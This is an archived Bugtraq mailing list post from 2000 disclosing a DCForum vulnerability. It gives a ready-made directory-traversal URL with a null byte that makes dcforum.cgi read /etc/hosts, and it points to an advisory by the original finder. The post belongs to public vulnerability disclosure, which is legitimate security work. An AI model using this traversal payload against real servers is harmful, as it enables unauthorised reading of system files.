Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

DCForum Exploit (1.0 - 6.0)

From: SteeLe <SteeLe () PRIVACYX COM>
Date: Thu, 28 Dec 2000 10:26:01 -0500
Heres an working exploit, dont know why i sent a script. I guess it was for the lazy people but anyway

simple exploitation:
http://localhost/dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/hosts%00


The Vendor has been contacted long ago by the original founder of this bug CGISecurity.com. Before using the exploit 
there is information you should read for side effects and other things. CGISecurity.com wrote an advisory and it can be 
read at http://www.cgisecurity.com/advisory/2.txt

steeLe
Previous By Date Next
Previous By Thread Next

Current thread: